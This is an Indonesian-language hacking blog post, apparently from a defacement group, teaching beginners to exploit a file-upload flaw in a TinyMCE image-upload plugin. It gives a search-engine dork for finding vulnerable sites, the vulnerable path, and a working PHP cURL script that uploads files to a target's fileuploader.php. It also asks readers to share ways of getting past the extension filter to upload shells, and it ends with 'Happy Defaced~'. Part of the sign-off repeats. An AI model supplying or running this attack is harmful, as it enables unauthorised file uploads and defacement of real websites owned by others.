Mau sampai kapan ?!
Hello World ; Malam Fans, Please Say Hello Haters :*
xixixhi, Nuenomaru disini, Sekarang Nue akan Share Tutorial eXploit Tinymce Images File Upload Vulnerable
xixixhi yoii masih seputar Bug/Celah pada TinyMCE, baca juga Tutorial eXploit TinyMCE Ajax File Manager RCE
xixihi, ini tutorial Nue dapet dari Blog Official Marsel *tengkyu artikel tutorialnya.
Langsung intip tutorialnya :*
Dork :
inurl:/imgupload/ fileuploader.php
(Selebihnya kebangin lg menggunakan imajinasi vokepers kalian, biar dpt yg vuln n verawan)
1. Dorking di search Engine
exploit: /[path]/extlib/tinymce/plugins/imgupload/fileuploader.php
3. Vulnerability ~ {"error":"No files were uploaded."}
kurang lebihnya sih kek gitu <(")
4. Buat File Baru Berekstensi .php Contoh tinymce.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit dan taruh juga gambar/file yg ingin di upload sobat di directory yang sama dgn tinymce.php tadi
<?php
$uploadfile="namagambar.jpg";
$ch = curl_init("www.target.co.li/[path]/extlib/tinymce/plugins/imgupload/fileuploader.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
5. Buka Xampp kalian yang sudah terinstall, nyalakan apace sama mysql nya
6. Buka CMD dan ketikan perintah
cd C:/xampp/php
php namaexploitlo.php
7. jika sukses , akan muncul nama file sobat di CMD,dan akan keluar lengkap link akses file ente
Langsung cek awkwakaw
Note: File ekstensi hanya bisa: JPG, JPEG, PDF , GIF, PNG, TIF, TIFF , BMP
Ouhiya awkkwak, kalo ada yang berhasil Bypass Shell nya utk exploit ini,, kirim tutorialnya ke fanspage kami yah awkwak >.< ..
nanti akan kami posting disini, dgn anda sebagai author tutorialnya ^_^
xixihi tengkyu sebelumnya :*
Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")
bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak.
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Happy Defaced~
Sekian dan semoga bermanfaat .. terimakasih
source and thanks to:Official Marsel | Phantom Ghost | Sulawesi IT Sec
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Happy Defaced~
Sekian dan semoga bermanfaat .. terimakasih
source and thanks to:Official Marsel | Phantom Ghost | Sulawesi IT Sec
./Nuenomaru
bakar dlu Nikotinnya, seruput lagi Caffeine nya ^_^
#enjoyed
Visit and follow :
EmoticonEmoticon